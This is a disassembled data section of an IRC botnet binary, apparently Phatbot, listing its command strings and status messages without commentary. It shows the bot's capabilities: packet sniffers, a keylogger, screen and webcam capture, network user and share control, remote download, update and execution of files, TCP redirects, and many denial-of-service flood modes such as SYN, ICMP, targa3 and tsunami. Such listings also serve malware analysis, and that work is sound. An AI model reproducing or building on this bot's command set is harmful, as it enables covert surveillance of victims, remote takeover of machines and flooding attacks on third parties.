aCarnivorePacke db '- Carnivore packet sniffer active.',0
align 4
dword_441E38 dd 234032Dh, 696E7370h, 3026666h ; DATA XREF: sub_401CC7+4164�o
aFailedToSta_13 db '- Failed to start sniffer thread, error: <%d>.',0
align 4
; char aOff[]
aOff db 'off',0 ; DATA XREF: sub_401CC7+4171�o
dword_441E78 dd 234032Dh, 696E7370h, 3026666h ; DATA XREF: sub_401CC7+4194�o
aCarnivoreStopp db '- Carnivore stopped. (%d thread(s) stopped.)',0
align 4
dword_441EB4 dd 234032Dh, 696E7370h, 3026666h ; DATA XREF: sub_401CC7:loc_405E65�o
aNoCarnivoreThr db '- No Carnivore thread found.',0
align 10h
; char aSniffer[]
aSniffer db 'sniffer',0 ; DATA XREF: sub_401CC7+41A9�o
; char aOn_0[]
aOn_0 db 'on',0 ; DATA XREF: sub_401CC7+41C0�o
align 4
unk_441EEC db 2Dh ; - ; DATA XREF: sub_401CC7+41E0�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aAlreadyRunni_2 db '- Already running.',0
; char asc_441F0C[]
asc_441F0C db '-' ; DATA XREF: sub_401CC7+4247�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aPhatbotPacketS db '- Phatbot packet sniffer active.',0
align 4
unk_441F3C db 2Dh ; - ; DATA XREF: sub_401CC7+42B6�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aFailedToSta_14 db '- Failed to start sniffer thread, error: <%d>.',0
; char aOff_1[]
aOff_1 db 'off',0 ; DATA XREF: sub_401CC7+42C3�o
unk_441F7C db 2Dh ; - ; DATA XREF: sub_401CC7+42E6�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aPhatbotSniffer db '- Phatbot sniffer stopped. (%d thread(s) stopped.)',0
unk_441FBC db 2Dh ; - ; DATA XREF: sub_401CC7:loc_405FB7�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aNoPhatbotSniff db '- No Phatbot sniffer thread found.',0
; char aIdent[]
aIdent db 'ident',0 ; DATA XREF: sub_401CC7+42FB�o
align 4
; char aOn_1[]
aOn_1 db 'on',0 ; DATA XREF: sub_401CC7+4312�o
align 4
dword_441FF8 dd 234032Dh, 6E656469h, 3026474h ; DATA XREF: sub_401CC7+432E�o
aAlreadyRunni_3 db '- Already running.',0
align 4
; char asc_442018[]
asc_442018 db '-' ; DATA XREF: sub_401CC7+433E�o
db 3, 34h, 2
dd 6E656469h, 3026474h
aServerRunnin_0 db '- Server running on Port: 113.',0
align 4
dword_442044 dd 234032Dh, 6E656469h, 3026474h ; DATA XREF: sub_401CC7+438B�o
aFailedToSta_15 db '- Failed to start server, error: <%d>.',0
align 4
; char aOff_2[]
aOff_2 db 'off',0 ; DATA XREF: sub_401CC7+4398�o
dword_44207C dd 234032Dh, 6E656469h, 3026474h ; DATA XREF: sub_401CC7+43BB�o
aServerStopped_ db '- Server stopped. (%d thread(s) stopped.)',0
align 4
dword_4420B4 dd 234032Dh, 6E656469h, 3026474h ; DATA XREF: sub_401CC7:loc_40608C�o
aNoThreadFound_ db '- No thread found.',0
align 4
; char aKeylog[]
aKeylog db 'keylog',0 ; DATA XREF: sub_401CC7+43D0�o
align 4
; char aOn_2[]
aOn_2 db 'on',0 ; DATA XREF: sub_401CC7+43E8�o
align 10h
; char aFile[]
aFile db 'file',0 ; DATA XREF: sub_401CC7+43F9�o
align 4
dword_4420E8 dd 234032Dh, 6C79656Bh, 302676Fh ; DATA XREF: sub_401CC7+444D�o
aAlreadyRunni_4 db '- Already running.',0
align 4
; char aFile_0[]
aFile_0 db 'file',0 ; DATA XREF: sub_401CC7+4464�o
align 10h
; char asc_442110[]
asc_442110 db '-' ; DATA XREF: sub_401CC7+44D1�o
db 3, 34h, 2
dd 6C79656Bh, 302676Fh
aKeyLoggerActiv db '- Key logger active.',0
align 4
dword_442134 dd 234032Dh, 6C79656Bh, 302676Fh ; DATA XREF: sub_401CC7+4540�o
aFailedToSta_16 db '- Failed to start logging thread, error: <%d>.',0
align 10h
; char aOff_3[]
aOff_3 db 'off',0 ; DATA XREF: sub_401CC7+440A�o
dword_442174 dd 234032Dh, 6C79656Bh, 302676Fh ; DATA XREF: sub_401CC7+442D�o
aKeyLoggerStopp db '- Key logger stopped. (%d thread(s) stopped.)',0
align 10h
dword_4421B0 dd 234032Dh, 6C79656Bh, 302676Fh ; DATA XREF: sub_401CC7:loc_4060FE�o
aNoKeyLoggerThr db '- No key logger thread found.',0
align 4
; char aNet[]
aNet db 'net',0 ; DATA XREF: sub_401CC7+454B�o
; char aStart[]
aStart db 'start',0 ; DATA XREF: sub_401CC7+45A1�o
align 4
aS_3 db '%s',0 ; DATA XREF: sub_401CC7+45C2�o
align 4
unk_4421EC db 2Dh ; - ; DATA XREF: sub_401CC7+45E4�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aServiceListCom db '- Service list completed.',0
align 10h
unk_442210 db 2Dh ; - ; DATA XREF: sub_401CC7:loc_4062B5�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aServiceListFai db '- Service list failed.',0
; char aStop[]
aStop db 'stop',0 ; DATA XREF: sub_401CC7+45FB�o
align 4
aS_4 db '%s',0 ; DATA XREF: sub_401CC7+4618�o
align 4
; char aPause[]
aPause db 'pause',0 ; DATA XREF: sub_401CC7+4625�o
align 4
aS_5 db '%s',0 ; DATA XREF: sub_401CC7+4642�o
align 4
; char aContinue[]
aContinue db 'continue',0 ; DATA XREF: sub_401CC7+464F�o
align 4
aS_6 db '%s',0 ; DATA XREF: sub_401CC7+466C�o
align 4
; char aDelete_0[]
aDelete_0 db 'delete',0 ; DATA XREF: sub_401CC7+4679�o
align 10h
aS_7 db '%s',0 ; DATA XREF: sub_401CC7+4696�o
align 4
; char aShare[]
aShare db 'share',0 ; DATA XREF: sub_401CC7+46A3�o
align 4
aS_8 db '%s',0 ; DATA XREF: sub_401CC7+46CC�o
align 10h
aS_9 db '%s',0 ; DATA XREF: sub_401CC7+46E8�o
align 4
unk_442274 db 2Dh ; - ; DATA XREF: sub_401CC7+470B�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aShareListCompl db '- Share list completed.',0
align 4
unk_442298 db 2Dh ; - ; DATA XREF: sub_401CC7:loc_4063DC�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aShareListFaile db '- Share list failed.',0
align 4
; char aUser_0[]
aUser_0 db 'user',0 ; DATA XREF: sub_401CC7+4722�o
align 10h
aS_10 db '%s',0 ; DATA XREF: sub_401CC7+475B�o
align 4
aS_11 db '%s',0 ; DATA XREF: sub_401CC7+4788�o
align 4
aS_12 db '%s',0 ; DATA XREF: sub_401CC7+479F�o
align 4
unk_4422CC db 2Dh ; - ; DATA XREF: sub_401CC7+47C2�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aUserListComple db '- User list completed.',0
unk_4422EC db 2Dh ; - ; DATA XREF: sub_401CC7:loc_406493�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aUserListFailed db '- User list failed.',0
align 4
; char aSend_0[]
aSend_0 db 'send',0 ; DATA XREF: sub_401CC7+47D9�o
align 4
aS_13 db '%s',0 ; DATA XREF: sub_401CC7+4805�o
align 4
unk_442318 db 2Dh ; - ; DATA XREF: sub_401CC7:loc_4064D6�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aNoMessageSpeci db '- No message specified.',0
align 4
unk_44233C db 2Dh ; - ; DATA XREF: sub_401CC7:loc_4064E0�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aCommandUnknown db '- Command unknown.',0
unk_442358 db 2Dh ; - ; DATA XREF: sub_401CC7+456F�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aFailedToLoadAd db '- Failed to load advapi32.dll or netapi32.dll.',0
; char aCapture[]
aCapture db 'capture',0 ; DATA XREF: sub_401CC7+4824�o
; char aCap[]
aCap db 'cap',0 ; DATA XREF: sub_401CC7+4839�o
; char aScreen[]
aScreen db 'screen',0 ; DATA XREF: sub_401CC7:loc_4090A0�o
align 4
; char asc_4423A4[]
asc_4423A4 db '-' ; DATA XREF: sub_401CC7+740A�o
db 3, 34h, 2
db 63h ; c
db 61h, 70h, 74h
db 75h ; u
db 72h, 65h, 2
db 3
aScreenCaptureS db '- Screen capture saved to: %s.',0
unk_4423D0 db 2Dh ; - ; DATA XREF: sub_401CC7:loc_4090E1�o
db 3, 34h, 2
db 63h ; c
db 61h, 70h, 74h
db 75h ; u
db 72h, 65h, 2
db 3
aErrorWhileCapt db '- Error while capturing screen.',0
align 10h
; char asc_442400[]
asc_442400 db '-' ; DATA XREF: sub_401CC7:loc_4090E8�o
db 3, 34h, 2
db 63h ; c
db 61h, 70h, 74h
db 75h ; u
db 72h, 65h, 2
db 3
aNoFilenameSpec db '- No filename specified for screen capture.',0
align 4
; char aDrivers[]
aDrivers db 'drivers',0 ; DATA XREF: sub_401CC7:loc_4090FB�o
; char asc_442444[]
asc_442444 db '-' ; DATA XREF: sub_401CC7+7481�o
db 3, 34h, 2
db 63h ; c
db 61h, 70h, 74h
db 75h ; u
db 72h, 65h, 2
db 3
aDriverDSS_ db '- Driver #%d - %s - %s.',0
align 4
; char asc_44246C[]
asc_44246C db '-' ; DATA XREF: sub_401CC7+74B4�o
db 3, 34h, 2
db 63h ; c
db 61h, 70h, 74h
db 75h ; u
db 72h, 65h, 2
db 3
aDriverListComp db '- Driver list complete.',0
align 4
; char aFrame[]
aFrame db 'frame',0 ; DATA XREF: sub_401CC7:loc_409188�o
align 4
; char asc_44249C[]
asc_44249C db '-' ; DATA XREF: sub_401CC7+7538�o
db 3, 34h, 2
db 63h ; c
db 61h, 70h, 74h
db 75h ; u
db 72h, 65h, 2
db 3
aWebcamCaptureS db '- Webcam capture saved to: %s.',0
unk_4424C8 db 2Dh ; - ; DATA XREF: sub_401CC7:loc_40920F�o
db 3, 34h, 2
db 63h ; c
db 61h, 70h, 74h
db 75h ; u
db 72h, 65h, 2
db 3
aErrorWhileCa_0 db '- Error while capturing from webcam.',0
align 4
; char asc_4424FC[]
asc_4424FC db '-' ; DATA XREF: sub_401CC7:loc_409216�o
db 3, 34h, 2
db 63h ; c
db 61h, 70h, 74h
db 75h ; u
db 72h, 65h, 2
db 3
aInvalidParam_0 db '- Invalid parameters for webcam capture.',0
align 4
; char aVideo[]
aVideo db 'video',0 ; DATA XREF: sub_401CC7:loc_409229�o
align 4
unk_44253C db 2Dh ; - ; DATA XREF: sub_401CC7+75E6�o
db 3, 34h, 2
db 63h ; c
db 61h, 70h, 74h
db 75h ; u
db 72h, 65h, 2
db 3
aAmateurVideoSa db '- Amateur video saved to: %s.',0
align 4
unk_442568 db 2Dh ; - ; DATA XREF: sub_401CC7:loc_4092B7�o
db 3, 34h, 2
db 63h ; c
db 61h, 70h, 74h
db 75h ; u
db 72h, 65h, 2
db 3
aErrorWhileCa_1 db '- Error while capturing amateur video from webcam.',0
unk_4425A8 db 2Dh ; - ; DATA XREF: sub_401CC7:loc_4092C1�o
db 3, 34h, 2
db 63h ; c
db 61h, 70h, 74h
db 75h ; u
db 72h, 65h, 2
db 3
aInvalidParam_1 db '- Invalid parameters for amateur video capture.',0
align 4
; char aGethost[]
aGethost db 'gethost',0 ; DATA XREF: sub_401CC7+484E�o
; char aGh[]
aGh db 'gh',0 ; DATA XREF: sub_401CC7+4863�o
align 4
; char aSSSS_1[]
aSSSS_1 db '%s %s %s :%s',0 ; DATA XREF: sub_401CC7+7333�o
align 4
; char asc_442604[]
asc_442604 db '-' ; DATA XREF: sub_401CC7+735F�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aGethostSComman db 'Gethost: %s, Command: %s',0
align 4
; char asc_44262C[]
asc_44262C db '-' ; DATA XREF: sub_401CC7+737B�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aUnableToExtrac db 'Unable to extract Gethost command.',0
align 4
; char asc_44265C[]
asc_44265C db '-' ; DATA XREF: sub_401CC7+73C1�o
db 3, 34h, 2
dd 6E69616Dh, 202D0302h, 68746547h, 3A74736Fh, 2E732520h
dd 0
; char aKilllog[]
aKilllog db 'killlog',0 ; DATA XREF: sub_401CC7+488C�o
; char aKl[]
aKl db 'kl',0 ; DATA XREF: sub_401CC7+48A3�o
align 4
; char aAddalias[]
aAddalias db 'addalias',0 ; DATA XREF: sub_401CC7+48BA�o
align 10h
; char aAa[]
aAa db 'aa',0 ; DATA XREF: sub_401CC7+48D1�o
align 4
; char asc_442694[]
asc_442694 db '-' ; DATA XREF: sub_401CC7+72B2�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aAliasAddedS_ db 'Alias added: %s.',0
align 4
; char aPrivmsg_1[]
aPrivmsg_1 db 'privmsg',0 ; DATA XREF: sub_401CC7+48E8�o
; char aPm[]
aPm db 'pm',0 ; DATA XREF: sub_401CC7+48FF�o
align 10h
unk_4426C0 db 2Dh ; - ; DATA XREF: sub_401CC7+727E�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aPrivmsgSS_ db 'Privmsg: %s: %s.',0
align 10h
; char aAction[]
aAction db 'action',0 ; DATA XREF: sub_401CC7+4916�o
align 4
; char aA[]
aA: ; DATA XREF: sub_401CC7+492D�o
unicode 0, <a>,0
; char dword_4426EC
dword_4426EC dd 54434101h, 204E4F49h, 17325h ; DATA XREF: sub_401CC7+7203�o
unk_4426F8 db 2Dh ; - ; DATA XREF: sub_401CC7+7229�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aActionSS_ db 'Action: %s: %s.',0
; char aCycle[]
aCycle db 'cycle',0 ; DATA XREF: sub_401CC7+4944�o
align 4
; char aCy[]
aCy db 'cy',0 ; DATA XREF: sub_401CC7+495B�o
align 10h
; char a332_2[]
a332_2 db '332',0 ; DATA XREF: sub_401CC7+7168�o
; char aPartS_1[]
aPartS_1 db 'PART %s',0Dh,0Ah,0 ; DATA XREF: sub_401CC7+717D�o
align 10h
; char aJoinSS_2[]
aJoinSS_2 db 'JOIN %s %s',0Dh,0Ah,0 ; DATA XREF: sub_401CC7+71AA�o
align 10h
dword_442740 dd 234032Dh, 6E69616Dh, 202D0302h, 6C637943h, 2E65h
; DATA XREF: sub_401CC7+71B7�o
; char aMode_0[]
aMode_0 db 'mode',0 ; DATA XREF: sub_401CC7+4972�o
align 4
; char aM[]
aM: ; DATA XREF: sub_401CC7+4989�o
unicode 0, <m>,0
; char aModeS_0[]
aModeS_0 db 'MODE %s',0Dh,0Ah,0 ; DATA XREF: sub_401CC7+7147�o
align 4
unk_44276C db 2Dh ; - ; DATA XREF: sub_401CC7+7158�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aModeChangeS db 'Mode change: %s',0
; char aC_raw[]
aC_raw db 'c_raw',0 ; DATA XREF: sub_401CC7+49A0�o
align 10h
; char aC_r[]
aC_r db 'c_r',0 ; DATA XREF: sub_401CC7+49B7�o
; char aS_18[]
aS_18 db '%s',0Dh,0Ah,0 ; DATA XREF: sub_401CC7+70FA�o
align 4
dword_44279C dd 234032Dh, 6E6F6C63h, 2D030265h, 77615220h, 73252820h
; DATA XREF: sub_401CC7+711C�o
dd 25203A29h, 73h
; char aC_mode[]
aC_mode db 'c_mode',0 ; DATA XREF: sub_401CC7+49CE�o
align 10h
; char aC_m[]
aC_m db 'c_m',0 ; DATA XREF: sub_401CC7+49E5�o
; char aModeS[]
aModeS db 'MODE %s',0 ; DATA XREF: sub_401CC7+7052�o
; char aS_17[]
aS_17 db '%s',0Dh,0Ah,0 ; DATA XREF: sub_401CC7+708B�o
align 4
dword_4427D4 dd 234032Dh, 6E6F6C63h, 2D030265h, 646F4D20h, 25282065h
; DATA XREF: sub_401CC7+70AD�o
dd 203A2973h, 7325h
; char aC_nick[]
aC_nick db 'c_nick',0 ; DATA XREF: sub_401CC7+49FC�o
align 4
; char aC_n[]
aC_n db 'c_n',0 ; DATA XREF: sub_401CC7+4A13�o
; char aNickS_5[]
aNickS_5 db 'NICK %s',0 ; DATA XREF: sub_401CC7+6FC8�o
; char aS_16[]
aS_16 db '%s',0Dh,0Ah,0 ; DATA XREF: sub_401CC7+7000�o
align 4
; char dword_44280C[]
dword_44280C dd 234032Dh, 6E6F6C63h, 2D030265h, 63694E20h, 2528206Bh
; DATA XREF: sub_401CC7+7022�o
dd 203A2973h, 7325h
; char aC_join[]
aC_join db 'c_join',0 ; DATA XREF: sub_401CC7+4A2A�o
align 10h
; char aC_j[]
aC_j db 'c_j',0 ; DATA XREF: sub_401CC7+4A41�o
; char aJoinSS_1[]
aJoinSS_1 db 'JOIN %s %s',0 ; DATA XREF: sub_401CC7+6F81�o
align 10h
aS_15 db '%s',0Dh,0Ah,0 ; DATA XREF: sub_401CC7+6FBA�o
align 4
; char aC_part[]
aC_part db 'c_part',0 ; DATA XREF: sub_401CC7+4A58�o
align 10h
; char aC_p[]
aC_p db 'c_p',0 ; DATA XREF: sub_401CC7+4A6F�o
; char aPartS_0[]
aPartS_0 db 'PART %s',0 ; DATA XREF: sub_401CC7+6F16�o
; char aS_14[]
aS_14 db '%s',0Dh,0Ah,0 ; DATA XREF: sub_401CC7+6F4F�o
align 4
; char aTarga3[]
aTarga3 db 'targa3',0 ; DATA XREF: sub_401CC7+4A86�o
align 4
; char aT3[]
aT3 db 't3',0 ; DATA XREF: sub_401CC7+4A9D�o
align 10h
; char asc_442870[]
asc_442870 db '-' ; DATA XREF: sub_401CC7+6E96�o
db 3, 34h, 2
dd 67726174h, 3023361h
aFloodingSForSS db '- Flooding %s for %s seconds.',0
align 4
dword_44289C dd 234032Dh, 67726174h, 3023361h ; DATA XREF: sub_401CC7+6F05�o
aFailedToStartF db '- Failed to start flood thread, error: <%d>.',0
align 4
; char aTsunami[]
aTsunami db 'tsunami',0 ; DATA XREF: sub_401CC7+4AB4�o
; char aTsn[]
aTsn db 'tsn',0 ; DATA XREF: sub_401CC7+4ACB�o
; char asc_4428E4[]
asc_4428E4 db '-' ; DATA XREF: sub_401CC7+6D9B�o
db 3, 34h, 2
db 74h ; t
db 73h, 75h, 6Eh
db 61h ; a
db 6Dh, 69h, 2
db 3
aTsunamiHeading db '- Tsunami heading for %s (%s seconds).',0
; char asc_442918[]
asc_442918 db '-' ; DATA XREF: sub_401CC7+6E06�o
db 3, 34h, 2
db 74h ; t
db 73h, 75h, 6Eh
db 61h ; a
db 6Dh, 69h, 2
db 3
aFailedToSta_17 db '- Failed to start flood thread, error: <%d>.',0
align 4
; char aRepeat[]
aRepeat db 'repeat',0 ; DATA XREF: sub_401CC7+4AE2�o
align 4
; char aRp[]
aRp db 'rp',0 ; DATA XREF: sub_401CC7+4AF9�o
align 10h
; char a332_1[]
a332_1 db '332',0 ; DATA XREF: sub_401CC7+6C41�o
; char aRepeat_0[]
aRepeat_0 db 'repeat',0 ; DATA XREF: sub_401CC7+6C68�o
align 4
; char aSSSS_0[]
aSSSS_0 db '%s %s %s :%s',0 ; DATA XREF: sub_401CC7+6C95�o
align 4
; char asc_44297C[]
asc_44297C db '-' ; DATA XREF: sub_401CC7+6CBE�o
db 3, 34h, 2
dd 6E69616Dh, 202D0302h, 65706552h, 203A7461h, 7325h
; char asc_442994[]
asc_442994 db '-' ; DATA XREF: sub_401CC7:loc_4089C0�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aRepeatNotAllow db 'Repeat not allowed in command line: %s',0
align 4
; char aDelay[]
aDelay db 'delay',0 ; DATA XREF: sub_401CC7+4B10�o
align 10h
; char aDe[]
aDe db 'de',0 ; DATA XREF: sub_401CC7+4B27�o
align 4
; char a332_0[]
a332_0 db '332',0 ; DATA XREF: sub_401CC7+6BA2�o
; char aSSSS[]
aSSSS db '%s %s %s :%s',0 ; DATA XREF: sub_401CC7+6BE3�o
align 4
dword_4429E8 dd 234032Dh, 6E69616Dh, 202D0302h, 616C6544h, 2E79h
; DATA XREF: sub_401CC7:loc_4088EE�o
; char aUpdate[]
aUpdate db 'update',0 ; DATA XREF: sub_401CC7+4B3E�o
align 4
; char aUp_0[]
aUp_0 db 'up',0 ; DATA XREF: sub_401CC7+4B55�o
align 4
; char aSS_exe[]
aSS_exe db '%s%s.exe',0 ; DATA XREF: sub_401CC7+6A63�o
align 4
; char asc_442A14[]
asc_442A14 db '-' ; DATA XREF: sub_401CC7+6B0B�o
db 3, 34h, 2
dd 61647075h, 3026574h
aDownloadingUpd db '- Downloading update from: %s.',0
align 10h
dword_442A40 dd 234032Dh, 61647075h, 3026574h ; DATA XREF: sub_401CC7+6B7A�o
aFailedToStartD db '- Failed to start download thread, error: <%d>.',0
; char asc_442A7C[]
asc_442A7C db '-' ; DATA XREF: sub_401CC7:loc_40884B�o
db 3, 34h, 2
dd 61647075h, 3026574h
aBotIdMustBeDif db '- Bot ID must be different than current running process.',0
align 4
; char aExecute[]
aExecute db 'execute',0 ; DATA XREF: sub_401CC7+4B6C�o
; char aE[]
aE: ; DATA XREF: sub_401CC7+4B83�o
unicode 0, <e>,0
unk_442AD0 db 2Dh ; - ; DATA XREF: sub_401CC7+69F6�o
db 3, 34h, 2
db 65h ; e
db 78h, 65h, 63h
db 2
db 3, 2Dh, 20h
aCouldnTExecute db 'Couldn',27h,'t execute file.',0
align 4
dword_442AF4 dd 234032Dh, 63657865h, 202D0302h, 6D6D6F43h, 73646E61h
; DATA XREF: sub_401CC7+6A01�o
dd 7325203Ah, 0
; char aFindfile[]
aFindfile db 'findfile',0 ; DATA XREF: sub_401CC7+4B9A�o
align 4
; char aFf[]
aFf db 'ff',0 ; DATA XREF: sub_401CC7+4BB1�o
align 10h
; char asc_442B20[]
asc_442B20 db '-' ; DATA XREF: sub_401CC7+68E6�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 66h ; f
db 69h, 6Ch, 65h
db 2
db 3, 2Dh, 20h
aSearchingForFi db 'Searching for file: %s in: %s.',0
align 10h
; char asc_442B50[]
asc_442B50 db '-' ; DATA XREF: sub_401CC7+695C�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 66h ; f
db 69h, 6Ch, 65h
db 2
db 3, 2Dh, 20h
aFailedToSta_18 db 'Failed to start search thread, error: <%d>.',0
; char aRename[]
aRename db 'rename',0 ; DATA XREF: sub_401CC7+4BC8�o
align 4
; char aMv[]
aMv db 'mv',0 ; DATA XREF: sub_401CC7+4BDF�o
align 4
; char asc_442B98[]
asc_442B98 db '-' ; DATA XREF: sub_401CC7+680A�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Ch, 65h
db 2
db 3, 2Dh, 20h
aRenameSToS_ db 'Rename: ',27h,'%s',27h,' to: ',27h,'%s',27h,'.',0
align 4
dword_442BBC dd 234032Dh, 656C6966h, 2D0302h ; DATA XREF: sub_401CC7:loc_4084E6�o
; char aIcmpflood[]
aIcmpflood db 'icmpflood',0 ; DATA XREF: sub_401CC7+4BF6�o
align 4
; char aIcmp[]
aIcmp db 'icmp',0 ; DATA XREF: sub_401CC7+4C0D�o
align 4
; char asc_442BDC[]
asc_442BDC db '-' ; DATA XREF: sub_401CC7+676E�o
db 3, 34h, 2
db 69h ; i
db 63h, 6Dh, 70h
db 2
db 3, 2Dh, 20h
aFloodingSFor_0 db 'Flooding: (%s) for %s seconds.',0
align 4
unk_442C08 db 2Dh ; - ; DATA XREF: sub_401CC7+67DE�o
db 3, 34h, 2
db 69h ; i
db 63h, 6Dh, 70h
db 2
db 3, 2Dh, 20h
aFailedToSta_19 db 'Failed to start flood thread, error: <%d>.',0
align 10h
unk_442C40 db 2Dh ; - ; DATA XREF: sub_401CC7:loc_4084AF�o
db 3, 34h, 2
db 69h ; i
db 63h, 6Dh, 70h
db 2
db 3, 2Dh, 20h
aInvalidFloodTi db 'Invalid flood time must be greater than 0.',0
align 4
; char aClone_0[]
aClone_0 db 'clone',0 ; DATA XREF: sub_401CC7+4C36�o
align 10h
; char aC[]
aC: ; DATA XREF: sub_401CC7+4C4D�o
unicode 0, <c>,0
; char asc_442C84[]
asc_442C84 db '-' ; DATA XREF: sub_401CC7+667C�o
db 3, 34h, 2
dd 6E6F6C63h, 3027365h
aCreatedOnSDInC db '- Created on %s:%d, in channel %s.',0
align 4
dword_442CB4 dd 234032Dh, 6E6F6C63h, 3027365h ; DATA XREF: sub_401CC7+66EB�o
aFailedToSta_20 db '- Failed to start clone thread, error: <%d>.',0
align 10h
; char aDdos_syn[]
aDdos_syn db 'ddos.syn',0 ; DATA XREF: sub_401CC7+4C64�o
align 4
; char aDdos_ack[]
aDdos_ack db 'ddos.ack',0 ; DATA XREF: sub_401CC7+4C7B�o
align 4
; char aDdos_random[]
aDdos_random db 'ddos.random',0 ; DATA XREF: sub_401CC7+4C92�o
; char asc_442D14[]
asc_442D14 db '-' ; DATA XREF: sub_401CC7+6594�o
db 3, 34h, 2
db 64h ; d
db 64h, 6Fh, 73h
db 2
db 3, 2Dh, 20h
aFloodingSSForS db 'Flooding: (%s:%s) for %s seconds.',0
align 4
unk_442D44 db 2Dh ; - ; DATA XREF: sub_401CC7+6603�o
db 3, 34h, 2
db 64h ; d
db 64h, 6Fh, 73h
db 2
db 3, 2Dh, 20h
aFailedToSta_21 db 'Failed to start flood thread, error: <%d>.',0
align 4
; char aWisdom_udp[]
aWisdom_udp db 'wisdom.udp',0 ; DATA XREF: sub_401CC7+4CA9�o
align 4
unk_442D88 db 2Dh ; - ; DATA XREF: sub_401CC7+4D80�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 75h
db 64h ; d
db 70h, 29h, 2
db 3
aFailedToSta_22 db '- Failed to start flood thread, error: <%d>.',0
align 4
; char aSynflood[]
aSynflood db 'synflood',0 ; DATA XREF: sub_401CC7+4D8D�o
align 4
; char aSyn[]
aSyn db 'syn',0 ; DATA XREF: sub_401CC7+4DA4�o
; char asc_442DD8[]
asc_442DD8 db '-' ; DATA XREF: sub_401CC7+649B�o
db 3, 34h, 2
db 73h ; s
db 79h, 6Eh, 2
db 3
aFloodingSSFo_0 db '- Flooding: (%s:%s) for %s seconds.',0
align 4
unk_442E08 db 2Dh ; - ; DATA XREF: sub_401CC7+650A�o
db 3, 34h, 2
db 73h ; s
db 79h, 6Eh, 2
db 3
aFailedToSta_23 db '- Failed to start flood thread, error: <%d>.',0
align 10h
; char aSkysyn[]
aSkysyn db 'skysyn',0 ; DATA XREF: sub_401CC7+4DBB�o
align 4
; char asc_442E48[]
asc_442E48 db '-' ; DATA XREF: sub_401CC7+4E3E�o
db 3, 34h, 2
dd 73796B73h, 3026E79h
aFloodingSSFo_1 db '- Flooding: (%s:%s) for %s seconds.',0
dword_442E78 dd 234032Dh, 73796B73h, 3026E79h ; DATA XREF: sub_401CC7+4EAD�o
aFailedToSta_24 db '- Failed to start flood thread, error: <%d>.',0
align 4
; char aPhatwonk[]
aPhatwonk db 'phatwonk',0 ; DATA XREF: sub_401CC7+4EBA�o
align 10h
; char aWonk[]
aWonk db 'wonk',0 ; DATA XREF: sub_401CC7+4ED1�o
align 4
; char asc_442EC8[]
asc_442EC8 db '-' ; DATA XREF: sub_401CC7+63B3�o
db 3, 34h, 2
db 77h ; w
db 6Fh, 6Eh, 6Bh
db 2
db 3, 2Dh, 20h
aFloodingSFor_1 db 'Flooding %s for %s seconds using delay %s ms.',0
align 4
unk_442F04 db 2Dh ; - ; DATA XREF: sub_401CC7+6422�o
db 3, 34h, 2
db 77h ; w
db 6Fh, 6Eh, 6Bh
db 2
db 3, 2Dh, 20h
aFailedToSta_25 db 'Failed to start flood thread, error: <%d>.',0
align 4
; char aDownload[]
aDownload db 'download',0 ; DATA XREF: sub_401CC7+4EE8�o
align 4
; char aDl[]
aDl db 'dl',0 ; DATA XREF: sub_401CC7+4EFF�o
align 4
; char asc_442F4C[]
asc_442F4C db '-' ; DATA XREF: sub_401CC7+62CB�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aDownloadingUrl db 'Downloading URL: %s to: %s.',0
unk_442F78 db 2Dh ; - ; DATA XREF: sub_401CC7+633A�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aFailedToSta_26 db 'Failed to start transfer thread, error: <%d>.',0
align 4
; char aRedirect[]
aRedirect db 'redirect',0 ; DATA XREF: sub_401CC7+4F16�o
align 4
; char aRd[]
aRd db 'rd',0 ; DATA XREF: sub_401CC7+4F2D�o
align 4
; char asc_442FC8[]
asc_442FC8 db '-' ; DATA XREF: sub_401CC7+618D�o
db 3, 34h, 2
db 72h ; r
db 65h, 64h, 69h
db 72h ; r
db 65h, 63h, 74h
db 2
db 3, 2Dh, 20h
aTcpRedirectCre db 'TCP redirect created from: %s:%d to: %s:%d.',0
